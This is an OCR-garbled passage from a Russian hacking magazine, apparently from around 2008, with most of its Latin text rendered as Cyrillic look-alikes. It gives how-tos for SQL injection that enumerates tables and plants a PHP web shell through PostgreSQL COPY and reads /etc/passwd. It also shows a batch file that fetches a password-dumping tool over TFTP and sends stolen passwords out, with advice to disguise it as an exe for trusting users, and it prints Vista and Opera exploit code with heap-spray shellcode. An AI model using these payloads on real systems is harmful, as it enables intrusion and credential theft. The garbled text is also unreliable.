3. Теперь получим список всех табличек для текущей БД (при условии, 
что данные <= 1024байта] за один запрос в одном поле: 



ТЩЦр: //члплм.Ьаскесі. сот/іпс!ех.ркр?іс1=- 
1+ШІОЫ+ЗЕЬЕСТ+ОКОиР_СОЕСАТ (ТАВЬЕ_ЫАМЕ ЗЕРАКАТОК 
0?0а) +РК0М+іп1огтаЕіоп_зскета . ТАВЬЕЗ/* 

Думаю, принцип использования функции ты понял, а почитать дополни- 
тельную инфу потеме можно в блоге РагОг’а: 

дгоир сопсаТ 
Удачи :). 




ЗАДАЧА: 



] СОЗДАТЬ КОД, КОТОРЫЙ будет изменять инструк- 
цию, ПЕРЕДАЮЩУЮ ЕМУ УПРАВЛЕНИЕ, С ПОСЛЕДУЮЩИМ ВОЗ- 
ВРАТОМ УПРАВЛЕНИЯ НАНЕЕЖЕ 
РЕШЕНИЕ: 



Иногда необходимо задать кодокопателю задачу и наставить ловушек, 
из которых выбраться будет непросто. Кактебе, например, идея: превра- 
тить некоторую исходную инструкцию РЕ-файла в переход к коду, — он 
будет выполнять модификацию этой инструкции перехода (от которой 
получил управление], превращая ее в исходную. 



Схематично этот процесс выгля- 
дит следующим образом: 

[Ручное выполнение преобразо- 
вания над инструкцией — превра- 
щение ее в переход] > [Выпол- 
нение инструкции (переход к 
управляющему коду]] > [Выпол- 
нение кода обратного преобразо- 
вания] > [Передача управления на 
преобразованную инструкцию] 

Рассмотрим простой пример. Допус- 
тим, мы имеем программу, наточке входа [00401000] которой располага- 
ется инструкция «РИЗН 0». Ее двухбайтный опкод выглядит как«бА 00». 




Сейчас код выполнит модифи- 
кацию <ОМР», превращая его в 
инструкцию «РІІ5Н О» 



► 040 
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Предположим, что наш код обратного преобразования будет располагаться 
поадресу 00401026. Тогда инструкция перехода к нему будет выглядеть: 
«:Ітр 00401026»,аопкод ее (также двухбайтный] равен ЕВ 24. Значит, 
необходимо получить набор инструкций, который будет преобразовывать 
опкод«ЕВ 24»вопкод«бА 00». Самый простой способ — применениело- 
гической операции «ХОН» (хотя можно использоватьлюбые, скольугодно 
сложные, алгоритмы преобразования]. Чтобы превратить машинное слово 
«ЕВ24»вслово«6А00», необходимо вы пол нить операцию ХОН с некоторым 
числом X: ЕВ24 ХОК X = 6А00. Вспомним математическую логику и по- 
лучим число X следующим образом : X = 6А00 ХОК ЕВ24, откудаХ = 8124. 
Учтем, что процессор забирает данные «задом наперед»; для преобразова- 
ния одной инструкции в другую нужно будет выполнить операцию ХОН 2481 . 
Итак, вот последовательность действий: 

1. Открываем программу в ОНуйВО и изменяем инструкцию «РІІЗН 0», 
расположенную по адресу 00401000, на инструкцию «зшр 00401026», 
имеющую опкод ЕВ24. 

2. Начиная с адреса 00401026, размещаем следующий код, выполня- 
ющий преобразование инструкции вызова: 



00401026 МОѴ ЕАХ , 00401000 ; помещаем в регистр ЕАХ 

адрес изменяемой инструкции 

0040102В МОѴ ЕВХ, [ЕАХ] ; помещаем опкод инс- 

трукции в регистр ЕВХ 

0040102Б ХОК ЕВХ, 2481 ; выполняем операцию ХОК 

— приводим инструкцию «зшр 0040102 6» к виду «РТОЗН 0» 
00401033 МОѴ [ЕАХ], ЕВХ; записываем измененную инструк- 
цию. . . 

00401035 ДМР 00401000 ; ...и передаем ей управление 

3. Запускаем программу для пошагового выполнения и наслаждаемся 
результатами трюка. Это действительно работает! 

Сейтрюк — лишь часть обширного набора средств «запудрива- 
ния мозгов реверсеру». Он прост, но содержит в себе большой 
потенциал: к примеру, можно производить множественные мо- 
дификации одной инструкции, усложнять алгоритм преобразова- 
ния, делая его неявным или «размазанным» по коду программы, 
— и так далее. 




ЗАДАЧА: 



] ЗАМУТИТЬ СЕРВИС ПО ПРОВЕРКЕ ФАЙЛОВ РАЗЛИЧНЫ- 
МИ АНТИВИРУСАМИ 

РЕШЕНИЕ: 



В последнее время можно наблюдать распространение сервисов по 
проверке файлов разными антивирусами. Одним из первых подобные 
услуги начал предоставлять известный ресурс ѵѵѵѵѵѵ.ѵігизіоіаі. сот . 
Впоследствии появился целый ряд подобных проектов, некоторые из 
них представляют собой вполне самостоятельные стехнической точки 
зрения экземпляры, а большинство работает через ѵѵѵѵѵѵ.ѵігі 
(еще и деньги за проверку берут, в размере Іѵѵтгза файл]. Воттакие пи- 
роги :]. Сейчас мы постараемся исправить эту несправедливость. Итак: 

1. Ищем/покупаем/ломаем/еіс сервер с наличием: 

• РНР5 с поддержкой сІІПІ_, доступ кфункции зеЦ_Сіше_1ішіЦ ( ) ; 

• Поддержка .Ыюссезз; 

• Наличие веб-сервера (Апач/еіс] ; 

2. Заливаем содержимое архива (взять с нашего ДВД, респектавтору 
— СЬааК’у] на сервер; 

3. Ставим чмод 777 на каталог . /Тііез; 

4. Редактируем файл іпсіех.рітр, настройки которого вы глядят следу- 
ющим образом: 



# — — — — —Настройки— — — -# 

$ирс!іг = ' Іііез ' ; #папка для загрузки файлов 
$шах5зІ2е = 2 048; #максимальный размер файла в КБ 



ѴІКІѴ5 
ГА. ТОТАЬ 



СНшй. 



& ѴвшІаЫ Рііе - СЪіСІНГ 



Чекаем файло 



$з1еер = 5; #задержка обновлений в секундах (рекоменду- 
ется 5) 

$аЬогб = 180; #максимальное время проверки в секундах 

Вот, собственно, и все. При желании ты можешь модернизировать 
скрипт, естественно, не забывая про копирайты :). 

По неподтвержденным слухам, ѵѵѵѵѵѵ.ѵігизіоіаі.сог ; рассылает все 
загружаемые для проверки файлы антивирусным компаниям, но 
это лишь слухи и догадки. Так что, юзать или нет — решать тебе, а 
скрипт от многоуважаемого всеми СЬааК’а ты найдешь на нашем 
ДВД. 




ЗАДАЧА: 



| ПОЛУЧИТЬ ДОСТУП К ФАЙЛАМ НА СЕРВЕРЕ ЧЕРЕЗ 50і_- 
ИНЪЕКЦИЮ В Р05Т6КЕ50І. 

РЕШЕНИЕ: 



Несмотря нато, что самыми распространенными СУБДявляются 
Му5СП_ и М55СІІ_, нередки и случаи «знакомства» с Роз1:дге5С11_. У многих 
неопытных хакеров эта СУБД вызывает массу вопросов. Дабы не вво- 
дить тебя лишний раз в заблуждение, я проясню все еще раз — четко и 
доходчиво. Кстати, забегая вперед, скажу, что в РозІдгеЗОБ работать с 
файлами, хранящимися на сервере, гораздо удобнее, нежели, напри- 
мер, в мускуле. Изначально у нас есть два варианта: 

1. Залить веб-шелл и работать через него (наиболее удобный и пред- 



почтительный вариант — увы, 
возможен не всегда]. 

2. Читать содержимое каталогов 
и файлов на сервере (некий 
аналогфункции 1оасі_Ті1е() 
в МуЗОЦ 

Теперь разберем алгоритм дейст- 
вий для каждого из вариантов. 
Чтобы успешно залить собствен- 
ный веб-шелл через скул-инъект на сервер с РозідгеЗОЦ необходимо: 

1. Создать новую табличку (скажем, СаЫе_Ті1е]. 

2. Записать в одно из полей содержимое нашего веб-шелла (например, 
<? раззСйги ( $_ОЕТ [стсі] ) ; ?>]. 

3. Выгрузить содержимое нашейтаблички (веб-шелл) вфайл, находя- 
щийся в веб-каталоге. 
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В общем виде выглядит это так: 

СКЕАТЕ ТАВЬЕ ЬаЫе_з]те11 (0ОІшпп_зЪе11 ТЕХТ ЮТ ШЬЬ) ; 
ІЫЗЕКТ ШТО со1ишп_з]те11 ѴАЫІЕЗ ( '<? раззЫтги($_ 

СЕТ [стй] ) ; ?>'); 

СОРУ ЬаЫе_зЬе11 (со1итп_з1іе11) ТО ' /ѵаг/ѵлллт/ЬДшІ/ 
зЬеІІ . рЬр ' ; 

4.Также можно воспользоваться выгрузкой в файл: 

СОРУ (ЗЕЬЕСТ '<?р1ір зузЬет ( $_СЕТ [стсі] ) ; ?>') ТО ’ЕІЬЕ_ 
ЬАМЕ ' 

Впрочем, иногда бывает невозможно произвести запись в веб-ката- 
лог, по прими не отсутствия прав. В этом случае тебе помогут следую- 
щие фичи — 

1. Подгрузка файла на чтение (аналог функции 1оай_бі1е() в 
МуБСИ): 



СКЕАТЕ ТАВЬЕ ЬаЫе_1і1е (со1итп_1і1е ТЕХТ ЮТ ШЬЬ) ; 
СОРУ ЬаЫе_іі1е (со1итп_:Еі1е) ЕКОМ 1 /еЬс/ раззѵгсР ; 
ЗЕЬЕСТ * ЕКОМ ЬаЫе_1і1е; 

2.Чтениеуказанного файла сппот строку: 

рд_геас!_:Еі 1 е ( ' Ыа . ЬхЬ ' ,11,111) 

(где пит — числовые значения соответствующих строк] 

3. Л истин г директории: 

рд_ 1 з_с!іг ( ' /Ьшр 1 ) 

4. Получение сведений обуказанном файле: 
рд_зЬаЬ_^і 1 е ( ' изегз . ЬхЬ ' ) 

Надеюсь, эти приемы помогуттебе не один раз. Пробуй :). 




ЗАДАЧА: 



ЗДОБАВИТЬ В РЕ-ФАИЛ ВОЗМОЖНОСТЬ ВЫЗОВА 
АРІ-ФУНКЦИИ, СОДЕРЖАЩЕЙСЯ В НЕКОТОРОЙ СТОРОННЕЙ 
ОН 

РЕШЕНИЕ: 



Для решения этой задачи воспользуемся утилитой «ІЮ Кіпд 2.0», 
которая позволяет добавлять в директорию импорта РЕ-файла новые 



элементы. 

1. Скачаем с ѵѵазт.ги или найдем на 0Ѵ0 утилиту «ІЮ Кіпд». 

2. Укажем программе файл, в который необходимо добавить импорт, 
выбрав его в окне обзора, открывающемся при нажатии на кнопку «Ріск 
а Еіе». 

3. Укажем программе сЛІ, в которой находится добавляемая функция, 
нажав на кнопку «Сііск Іо ріск йЩз) апсНЬеігАРПзИоасІсі». 

4. В появившемся окне, содержащем список АРІ-функций, выберем 
необходимые и нажмем на кнопку «АсИ ТЬет!». 

5. Завершим процесс добавления АРІ в директорию импорта нажатием 




Интерфейс программы аскетичен до крайности 



на «АсИ ТЬет!», предварительно установив флажок«Васкир» в окне 
программы (чтобы был создан Ьак-файл для восстановления программы 
в случае неудачи). Готово! Дополняй функциональность приложения 
собственным кодом, использующим стороннюю 




ЗАДАЧА: 



КОНВЕРТИРОВАТЬ БАТНИК В ЕХЕ-ФАЙЛ 



РЕШЕНИЕ: 



Для решения бытовых задач, зачастую проще всего набросать не- 
большой батник и юзать его в дальнейшем. Иногда этот самый бат- 
ник нужно впарить доверчивому юзеру, но как, если батник можно 
запросто просмотреть и изменить? Проблема отпадает сама собой, 
если кеерешению подойти нес пустыми руками, а при помощи 
утилы ЕхеЗсгірЕ которая создана специально для конвертации .Ьаі-, 
.ѵЬз- и дз-скриптов в исполняемые ехе-файлы. Алгоритм действий 
прост: 

1. Сливаемтулзу с нашего ОѴО. 

2. Инсталлируем на комп. 

3. Запускаем утилу и в окне редактора вбиваем содержимое батника 
(либо ѵбз/із-скрипта). 

4. Компилим. 

5. Получаем готовый купотреблению ехе’шник. 

Кстати, подобным образом конвертированы многие известныетебе 
«утилы», создающие админский акк на удаленном компе и запускающие 
телнет-сервис. В качестве примера лови батниктакого содержания: 




весію оИ 

ЕсЬо ореп ххх . ххх . 
ххх . ххх>до . ЬхЬ&&ес Ьо 
:ЕЬризег>>до.ЬхЬ&&ес1іо 
12345>>до . ЬхЬ & &ес] то 
деЬ раззехрогЬ. 
ехе>>до.ЬхЬ&&ес1ю 
Ьуе>>до . ЬхЬ 
ЕсЬо ореп ххх . ххх . ххх . 
ххх>зеп<і .ЬхЬ&&ес1 то 
1Ьризег>>зепс1 . ЬхЬ&&есЪ.о 
12 3 4 5>>зепс1. ЬхЬ&&ес1 то 
зепсі разз . ЬхЬ>>зепс1 . 
ЬхЬ&&ес1 то Ьуе>>зепсЗ . ЬхЬ 



ІЬр -з:до.ЬхЬ > пиі 
раззехрогЬ . ехе разз . ЬхЬ 
ІЬр -з: зепсі. ЬхЬ > пиі 

сіеі до.ЬхЬ зепсІ.ЬхЬ раззехрогЬ . ЬхЬ разз.ЬхЬ пате.ЬаЬ 



Думаю, пояснять здесь ничего не надо, верно? 

Для достижения наибольшего эффекта настоятельно реко- 
мендую использовать джойнеры, а также можно менять иконку 
ехе’шника. 



► 042 
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взлом 



№7 



ЩТЩЩПРОКИНУТЬ НТТР-ТРАФФИК 
ЧЕРЕЗ 5МТР-П0РТ 

РЕШЕНИЕ: 

В решении этой нетривиальной задачитебе 
поможет НоЗргоху — НТТРоѵегЗМТР Ргоху. 

Она состоит из двух частей: НоЗіцппеІи 
НоЗргоху. Функционирует все пока только под 
платформой ѴѴіпбоѵѵз. Первая из названных от- 
вечаетза использование НоЗШппеІ в качестве 
внешнего почтового сервера, который должен 
быть запущен от рута на 25 порту (ТСР — 5МТР). 

Он делает следующую вещь: все запросы 
писем изтвоей внешней локалки будут дости- 
гать его (ты меняешь настройки соединения 
усебя в клиенте], а потом перенаправляться. 

На удаленном сервере будут формироваться 
НТТР-кодированные ответы и высылаться 
тебе обратно в почтовом письме. Варианте 
НоЗргоху нацелен на то, что будет поднята 
НТТР-ргоху (іер 8080], с которой будут прозрачно 
перенаправляться запросы натвои почтовые сер- 
вера. Они будут делать всю работупо преобразованию НТТР-документов 
и их последующей высылке напрямую тебе в браузер. Итак, действуем: 

1 . Качаем НоБргоху по адресу ебде-зесигКѵ.сот/Ьозргохѵ.рбр (или берем 
с ОѴО]. 

2 . Редактируем конфиг Нозроху.сі'д следующего содержания: 




Нозіиппеі в работе 



шаі1_геЦгіеѵе_ргоСосо1=рор 
# Указание сервера входящей почты в локалке 

#рорЗ . ту зегѵег . сот 
таі1_ассезз_зегѵег= 

#Имя пользователя 



# Твой рабочий ЗМТР-сервер в локалке: 

#зтбр . тузегѵег . сот 
1оса1_зтбр_зегѵег= 

# Требует ли он авторизации (У/Ы) 
зтбр-аиб1і=Ы 

зтбр-изег=сбе1озо@ебде-зесигібу . сот 
зтбр-разз= 

# Здесь указывается спецификация используемого протокола 
(рор, ітар, #ітарзз1, рорззі) 



таз_изег=сбе1озо@ебде-зесигібу . сот 
#Пасс 

таз_раззж!= 

#Мыло, куда ты будешь получать письма с ІлЩВ-содержимым 
етаі1=сбе1оз о@ебде-зесигібу . сот 
#Почта для совершения НТТР-обращений 
ехД_етаі1=азбб@1ідиа1 . пеб 

3. Запускаем Ьозргоху.ехе и рвемся на любой сайт. 




ЗАДАЧА: 



|УЗНАТЬ ОТКРЫТЫЕ ПОРТЫ НА УДАЛЕННОМ УЗЛЕ 
НЕ СО СВОЕЙ МАШИНЫ 
РЕШЕНИЕ: 



Первое, что тут приходит в голову — использовать клиент-сервер- 
ные проекты. Другое дело, что, устанавливая подобное, ты можешь 
запалиться в логах. Более того, есть ряд ограничений (контроль портов 
администратором, Ьозі-Ьазеб і рз ит.п]. Тем не менее, в решении задачи 
тебе поможет софти на Пптар. 

1. Ставим на удаленном сервере ММАР ( гптар.зоигсеФгде.пеІ: ]. 

2. Добавляем пользователя на доступ ксофтине командой гптар- 
аббизег.ру ѵазіа. 

3. Коннектимся на соответствующий порт сервера со своей машины с 
помощью {еіпеі: или Сгптар.ру и начинаем рулить сканированием. 

Этой же архитектуры придерживается Ыеззиз. А второй метод — это 
воспользоваться одним из онлайн-сервисов ( іі зборрег.сотЛооІз/рогІ:- 
зсаппег ]. Правда, некоторые из них пишутлоги, а некоторые нет. Пусть 
достаточно давно, но был наезд со стороны органов безопасности США 
на создателя ЫМАР, который такой сервис в тестовом виде предостав- 
лял посетителям. т 



ЮзаемРЫМАР 
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ГД | ОБЗОР ЭКСПЛОЙТОВ 



КРИО КАОПЕРСКИ 



КРИТИЧЕСКИЕ ОШИБКИ ОБНАРУЖИВАЮТСЯ В ѴѴШ00ѴѴ5 ЕДВА ЛИ НЕ КАЖДУЮ НЕДЕЛЮ, НО 
ГЛОБАЛЬНЫЕ ЭПИДЕМИИ ВОЗНИКАЮТ, ПРЯМО СКАЖЕМ, НЕЧАСТО. ПОСЛЕДНЯЯ НАШУМЕВШАЯ 
УЯЗВИМОСТЬ ОТНОСИТСЯ К ВЕТХОЗАВЕТНОЙ ДЫРЕ В СЛУЖБЕ РРС ОСОМ, ЭКСПЛУАТИРУЕМОЙ 
ЧЕРВЕМ М5ВІ.А5Т. И ВОТ, НАКОНЕЦ, НОВАЯ ДЫРА И НОВЫЙ ЧЕРВЬ, РАСПРОСТРАНЯЮЩИЙСЯ СО 
СКОРОСТЬЮ ЛЕСНОГО ПОЖАРА — ОІММІѴ! АЗА НИМ — РУТКИТ КЕРЫЕЬВОТ.ОО, ПЛЮС ТОЛ ПА ВСЯ- 
КОЙ МЕЛКОЙ МАЛВАРИ ДО КУЧИ. ВСТРЕЧАЙТЕ АПЛОДИСМЕНТАМИ! 



М5ѴѴШ00ѴѴ5 

ЛОКАЛЬНОЕ 

РАЗРУШЕНИЕ ПАМЯТИ ЯДРА 



» ВгіеГ 



В конце ноября 2008 года австрийский хакер ТЬотаз Ііпіегіеііпег из 
компании рЫоп АС совместно с коллегами по цеху (Магіиз ѴѴасЫТег, 
Місбаеі ВигдЬасбег, Сагзоп НоипзНеІІ и Місбаеі Сгаддз] обнаружили 
переполнение буфера в ТСР/ІР-стеке Висты. По горячим следам они 
опубликовали статью «МісгозоН ѴІБТАТСР/ІРзІаскЬиіТегоѵегНоѵѵ», 
описывающую ужасные последствия стекового переполнения и тут же 
подхваченную журналисткой общественностью. На самом деле, «ТОР/ 
ІР-стек» не более чем метафора. Переполняющийся буфер расположен 
в куче, выделяемой ядерной функцией ЕхАІХосаВеРооШіВВіТад, 
тупо аллоцирующей 32 байта без проверки реальной длины переда- 
ваемых данных (поставляемых документированной АРІ-функцией 
СгеаВеІрЕогмаг<іЕпВгу2, экспортируемой библиотекой ірЫрарі . 
сан, входящей в штатную поставку как32-битной, так и 64-битной 
версий ѴѴіпбоѵѵзѴізІа...). Согласно М50ІМ, функция при ни мает структуру 
МІВ_ІРЕОКѴШЩ)_КОШ, включающую в себя поле РгеВіхЬепдСЪ. и 
определяющую размер префикса с максимально допустимой длиной в 
32 байта (по документации). В реальности же, РгебхІ_епд1:б представляет 
собой ОШЕЕ, передаваемый функции тетсру. Это позволяет переза- 
писывать ядерную памятьс прикладного уровня. Последствием будет 
либо голубой экран смерти, либо передача управления на збеіі-код. 
Поскольку вызов СгеаВеІрЕогмагсІЕпСгу2 требует администраторс- 
ких прав, достаточно многие эксперты по безопасности недооценивают 
угрозу, полагая, что злоумышленник, обладающий правами адми- 
нистратора, может«поиметь» систему и без переполнения (загрузить 
вредоносный драйвер, например). Воттолько 64-битные версии 
ѴѴіпбоѵѵз без цифровой подписи драйвер ни за что не загрузят, а потому 
даже локальные дыры ядра приобретают особую актуальность. Кстати 
говоря, не устраняемую установкой Зегѵісе Раск 1 ! 64-битные версии ХР 
также требуют обязательной цифровой подписи, но ошибки перепол- 
нениям! В_І РЕОКМАКІЭ_КСМ2 . 
РгеВіхЬепдВЬ. в них нет, как нет 
ее и в Зегѵег 2003. А все потому, что 
сетевой стек Висты был переписан 
с нуля, и ошибоктам... В общем, это 
непервая.и уж точно не последняя 
дыра. От глобальных потрясений 
нас спасает л ишь непопулярность 
Висты, обуславливающая не 
только малое количество уязвимых 
машин, но и нежелание хакеров 



тратить время на поискдыр, которые все равно неудастся использовать 
в «промышленных» масштабах. Ну, разве что в образовательных целях. 
Желающие поэкспериментировать найдутвсе необходимую техничес- 
кую информацию на зесигіМосиз.сот/агсЫѵе/І /498471 . 



»ТагдеІ5| 



Ѵіз1:а Ноте/Визіпезз/Епіюгргізе/Шіппаію х32/х64 5Р0/5Р1 



» Ехріоід 



Исходный текст ехрІоіХа, написанного на Си и вызывающего обруше- 
ние системы в голубой экран смерти, можно найти в статье Тботаз’а 
ІЭпіегІеіІпег’а или скачать с зесигіІѵЬсиз.сот/баІа/ѵиІпегаЬІІІбез/ 

7 с. Ключевой фрагмент программы приводится ниже. 
Жестко прошитые ІР-адреса руками нетрогать! Атака носитлокальный 
характер и за пределы узла-источника пакеты все равно не уходят. Так 
что ІР-адреса на суть дела никак не влияют. 

КЛЮЧЕВОЙ ФРАГМЕНТ ЕХРІ_ОІТ’А, 

ВЫЗЫВАЮЩЕГО РАЗРУШЕНИЕ ЯДРЕНОЙ ПАМЯТИ ВИСТЫ 

МІВ_ІРЕОКМАКВ_ЕОШ гоиВе ; 

гоиВе . ІпВегВасеІпсіех = аВоі(агдѵ[1] ) ; 

гоиВе . БезВіпаВіопРгеВіх . РгеВіхЬепдВЪ. = аВоі (агдѵ [2 ] ) ; 
гоиВе . БезВіпаВіопРгеВіх . РгеВіх . Ірѵ4 . зіп_ас!с1г . з_ас!с1г = 
іпеВ_ас!с1г ( ' 1 . 2 . 3 . О 1 ) ; 
гоиВе . ЫехВНор . Ірѵ4 . зіп_ас!с1г . з_а(Мг = 
іпеВ_аскіг ("11.22.33.44") ; 
гоиВе . РгоВосоІ = МІВ_ІРРКОТО_ЫЕТМСМТ; 
гоиВе. Огідіп = ЫІгоМапиаІ; 
гоиВе . ѴаІісІВіВеВіте = ОхВВВВВВВВ; 
гоиВе . РгеВеггейЬіВеВіше = ОхВВВВВВВВ; 
гоиВе. МеВгіс = 1; 

СгеаВеІрЕогѵ7агсіЕпВгу2 (&гоиВе) ; 



»5оІиІіоп 



МісгозоІІ: все еще не подтвердила атаку, а потому заплаток нет, и вряд ли 
скоро будут. В принципе, ядро несложно отпачить и самому, воткнув туда 
недостающую проверку, но смысла в этом мало. Проще не сидеть под 
администратором. 

М5ѴѴІЫ00ѴѴ5 

ЛОКАЛЬНЫЙ ОТКАЗ 
В ОБСЛУЖИВАНИИ 



» Вгіе* 



Еще один дефект ядра, затрагивающий Висту, был обнаружен 
хакером по кличке зиррог^кіііргод.сот. Одновременный вызов 
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» 



□ 



АРІ-функции ІІпбоокѴѴіпсІоѵѵзНоокЕх (снятие глобального хука] 
с переключением Рабочего Стола (за что отвечает АРІ-функция 
ЭѵѵіІсЬОезкІор] приводит к падению драйвера ѵѵіп32к.5уБ р выбрасы- 
вающего голубой экран смерти. Причем, обе АРІ-функции доступны 
непривилегированным пользователям! Это создает существенную 
угрозу для безопасности всей системы в целом. Той самой системы, 
надежность которой (если верить Руссиновичу] от переноса графи- 
ческой подсистемы в драйвер уровня ядра ничуть не пострадала. 
Наверное, Руссинович не читал Законов Мерфи. Применительно 
к ехрІоіЕу, выпущенному зиррог1:#кіІІргод’ом, хочу сказать, что 
одновременность вызова АР I -функций там обеспечивается путем 
отдачи процессорных квантов посредством 51еер(0] — воттакой 
хитроумный способ межпоточной синхронизации. А потоков ехріоіі: 
создает ровно четыре штуки. Следовательно, на четырехъядерной 
системе все потоки стартуют одновременно (ну, практически одно- 
временно] и отдавать кванты становится уже некому. Для повыше- 
ния стабильности работы ехрІоіЕа количество создаваемых потоков 
рекомендуется увеличить в несколько раз, иначе ѴѴіпсІоѵѵз обидится 
и не упадет. О причинах падения можно прочитать на тигрЬѵ-Іаѵѵ. 
пеЕги и 5есипМосиз.сопп/ЬісІ/32206 . 



»ТагдеІ5:| 



Дефект подтвержден в 5егѵег2003 ЗіапсІагсІ/ЕпІегргізе/ОаІасепІегхЗЗ/ 
х64 и Ѵізіа Ноте/Ргеппіипп/Шіппаіе х32/х64. Другие версии не проверя- 
лись, но есть все основания полагать, что они также уязвимы. 



» Ехріоігі 



Исходный текст ехрІоіЕа, написанный на приплюснутом Си, можно найти 
на зесигіМосиз.сопп/сІаІа/ѵиІпегаЬіЦЕез/ехрІоіІз/ѵѵбк.гі — в архив 
входит файл проекта Місгозоіі Ѵізиаі С++ и откомпилированный ехе/сІИ 
(динамическая библиотека необходима для организации хуков). 



»5оІи1іоп 



А нету! Во всяком случае, Місгозоіі хранит гробовое молчание — ни 
бюллетеней безопасности, ни заплаток. Приходится починять систе- 
му самостоятельно, поскольку дефект проявляется не только при ата- 
ке, но и в результате нормальной эксплуатации — хуки устанавливают 
достаточно многие приложения (драйвера мультимедийных клавиа- 
тур, например]. Они же поддерживают более одного рабочего стола, 
при активной работе с которым проблема встает в полный рост. Свой 
собственный Зегѵег 2003 я пофиксил путем горячего патча ИЗЕК32 . 
вьь в памяти, воткнув в начало функции ЕпкоокМіпсІочлгзНоокЕх 
проверку на вхождение ЗѵѵіСскЕезкСор с ожиданием выхода из 
последнего. 




ОРЕРА 

ЛОКАЛЬНОЕ ПЕРЕПОЛНЕНИЕ КУЧИ 



» Вгіе{ 



Количество дыр, обнаруженных в Опере, неуклонно растет. Поми- 
мо тривиального отказа в обслуживании (которым сегодня никого 
не удивишь), встречаются и критические ошибки, до пускающие 
удаленное выполнение зНеІІ-кода. Самая свежая уязвимость 
подобного рода датируется ноябрем 2008 года и относится к 
переполнению кучи при задании слишком длинного адреса 
(прядка ~16,500символов] в II Н Б типа Іііе. И хотя на Бесигііу 
Росиз (смотри зес игіМос из. со т/Ы 6/32323 ) дыра описывается 
как удаленная, переполнение происходит только при локальном 
открытии НТМБ-файла с кодом ехрІоіЕа. Однако, если жертва со- 
хранит страничку на диск, чтобы позднее просмотреть ее оШіпе, 
локальная атака тут же превратится в удаленную. Учитывая, что 
странички сохраняются не так уж редко, угроза атаки достаточ- 
но велика. Впрочем, малая распространенность Оперы служит 
надежной защитой :). 



»ТагдеІз| 



Уязвимость подтверждена в Опере 9.6 и 9.62. 



» Ехріоід 



Исходный текст ехрІоіЕа, вызывающего «Калькулятор», можно найти на 
ті[уѵ0гт.сопп/ехр[оіІ5/7135 . а ниже приведен его ключевой фрагмент. 

КОД ЕХРІ.ОІТА, АТАКУЮЩЕГО ОПЕРУ 

<ЗСГІрЦ> 

ѵаг і = 0 ; 

// ризЬ. ез, рор ез 

ѵаг Ыоск = ипезсаре ( " %и0607%и0607 " ) ; 

// шеСазрІоіС ШіпЕхес с : \ЖШОМЗ\зузЦет32 \са1с . ехе 
ѵаг зкеІІсосЗе = ипезсаре («%ие8Пс...%и4100») ; 
ѵѵЪ.і1е (Ыоск . ІепдСЪ. < 81920) Ыоск += Ыоск; 
ѵаг тетогу = п еѵѵ Аггау ( ) ; 

іог ( ; і<1000 ; і + + ) шетогу[і] += (Ыоск + зкеіісосіе) ; 
ѵаг еѵіі = " іііе://"; 

іог(ѵаг і = 0; і<16438; і + +) еѵіі += "X" ; 
еѵіі += "К." ; ѵѵіпсіоѵѵ. ІосаСіоп. геріасе (еѵіі) ; 

</зсгірС> 



»5оІи1іоп 



Несмотря на то, что разработчики Оперы были уведомлены первооткры- 
вателем дыры еще в сентябре, никакой реакции отних не последовало. 
Лекарства нет, и когда оно появится — неизвестно. 




М5ѴѴШ00ѴѴ5 

УДАЛЕННОЕ 

ПЕРЕПОЛНЕНИЕ БУФЕРА В РРС 



» Вгіе{ 



2 ноября 2008 года червь Морриса (исходные коды которого до сих 
пор хранятся в Бостонском Музее Науки) отметил свой 20-летний 
юбилей. И как раз в то же время вспыхнула новая масштабная 
эпидемия, распространяющаяся через дыру в службе НРС. Затра- 
гивает она все системы от ѴѴіпсІоѵѵз 2000 до Висты/5егѵег2008 включи- 
тельно и позволяетзабросить на целевую машину зловредный код безо 
всякой аутентификации. Уязвимости подвержены как32-битные,таки 
64-версии, что создает крайне благоприятныеусловия для размноже- 
ния червей. Тго]а п-5ру:ѴѴ32/0 і тт іѵ. А/В/С, \Л/32/Сопбскег.\л/огт, Тго)ап: 
ѴѴі п32/ѴѴесогІ.А/В , Тго)ап:ѴѴіп32/ СІогЕА/ІехрІоіі/сІг, ТпфапОо\л/п1оас1ег: 

ѴѴі п32/ѴВ .СО/СЭ — вот неполный списокзаразы, известной на данный 
момент, и этотсписок неуклонно растет. Большое количество публичных 
ехрІоіЕов существенно облегчаетжизнь вирусописателей, которым 
достаточно просто выдрать атакующий код и вставить его в свой проект, 
написанный на любом языке даже без знания ассемблера. И хотя 
МісгозоЛуже выпустила «лекарство», а поставщики систем обнаруже- 
ния вторжений добавили в базы новые сигнатуры, описывающие ос- 
новные вектора атаки (без привязки к конкретным вирусам], хакерские 
атаки захлебываться не собираются! Патч от Місгозоіі фикситтолько 
часть дыр, а существующие сигнатуры обходятся на ура (чуть позже мы 
покажем, какэто сделать). 

Короче, ситуация оченьсерьезна и заслуживает самого тщательного анализа. 
Какобычно, официальные источники с одержат толь ко обрывки информа- 
ции : тідюзоіішп/іюсііпе^ 

сот/ЬісІ/31 874 . ЬДрУ/ЫоазІесбпеЕсот/зѵѵі/ и Ыоаз.тзсІп.сот/зсІІ/ 
агсЬіѵе/2008/10/22/т508-067.азрх . 



»ТагдеІ5| 



Уязвимостьзатрагиваетвсю 
линейку ЫТ-подобных систем: ѴѴ2К 
Ргоіеззіопаі/ Эегѵег/АсІѵапсесІ/ 
ОаІасепІег5Р0/5Р1/5Р2/5РЗ/ 

5Р4, ХР ОоІсІ/Ноппе/РгоІеззіопаІ 
5Р0/5Р1 /5Р2/5РЗ х86/х86-64, Ѵізіа 
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Ноте/Визіпезз/ Епбегргізе/Шітаіе 5Р0/5Р1 х86/х86-64 р 52КЗ Біапбагсі/ 
□аІасеп6ег/АсІѵапсесІ/Еп{егргІ5е5Р0/5Р1/5Р2х86/х86-64/ІІапіит,52К8 
Біапбагб/ВаІасепІег/АбѵапсесІ/ЕпІегргізеЗРО х86/х86-64/ Ііапіит. 



|» ЕхрІоіІз| 



Готовых ехріоііі’ов много, рабочихже среди них... ну нею, чтобы нет совсем, 
но очень мало, да и те нуждаются в исполняемом стеке или работа ютлишь 
с известными им операционными системами (ѴѴ2К,ХР,52КЗ]. Под Висту 
и 52К8 боевых ехріоібов в открытом доступе пока нема, ноя покажу, каких 
написать! А писать мы их будем на основе уже существующего кода, ссылки 
на который приведены ниже: 

1 . М508-067 Ретоіе Біаск ОѵегКоѵѵ ѴиІпегаЬіІіІу Ехріоіі Ьу РоІутогрЬоигз 

поражает ѴѴ2К, написан на Си, даетудаленный шелл: тіІУѵОгт.сопп/ 
ехрІоі1:5/7 1 04 . 

